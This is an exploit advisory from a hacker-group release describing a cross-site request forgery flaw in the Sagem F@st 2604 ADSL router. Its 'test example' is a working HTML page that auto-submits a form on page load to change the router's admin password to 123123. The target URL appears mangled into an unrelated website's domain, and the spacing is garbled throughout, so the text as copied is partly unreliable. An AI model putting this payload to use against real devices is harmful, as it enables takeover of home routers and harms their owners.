|__ | _/|__] |__ | | __/
| |___ | ___ | |||||\_ |__] ||| \
========================================================== ==========================================================
####
Title: Sagem F @ ST 2604 CSRF Vulnerability (ADSL Router)
Author: KinG Of PiraTeS www.2cto.com t5r@hotmail.com
Website: http://www.sagem.com/index.php
Affected Versions: 253180972B May be Other Version are Affected
Test Platform: [Windows 7 Edition Int é grale]
####
##
# |> -------- ++ = [Dz Offenders Cr3w] ==++ -------- <|
1) Introduction
2) defect description
3) test example
> ----------------------------------------------------------------
1) Introduction
The Sagemcom F @ st 2604 is a wireless ADSL2/2 + router with one RJ-11 WAN port and four 10/100 Base-T LAN ports.
2) defect description
From sagem f @ st 2604 U can change the default "Admin" password Or Any User Password which is listening on TCP/IP port 80
Other versions may also be affected.
3) test example
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> Password successfully changed [CSRF Exploit change ADMIN password] </H2>
<Form method = "POST" name = "form0" action = "http://www.bkjia.com/password. cgi? SysPassword = 123123 ">
</Form>
</Body>
</Html>
-
123123 is the new password
-
####
Peace From Algeria